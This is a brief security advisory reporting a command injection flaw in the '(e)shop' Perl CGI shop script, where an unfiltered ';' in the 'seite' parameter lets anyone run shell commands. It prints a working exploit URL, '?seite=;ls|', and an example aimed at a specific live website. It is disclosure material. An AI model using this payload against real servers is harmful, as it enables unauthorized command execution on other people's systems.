------------[ advisory ]------------
name: (e)shop Online-Shop System
author:
WEBDISCOUNT, Inh. Michael Boehme
Problem:
Script doesnt check for symbol ";". any user
can execute any *nix commands on webserver.
exploit:
host/cgi-bin/eshop.pl?seite=;ls|
ex.
http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|
Bug found by Kernel|X|
[ twisted metal ]
E-Mail: [secure@punkass.com]
[kernelx@tmgroup.sh]
WWW: [ www.tmgroup.sh ]
------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
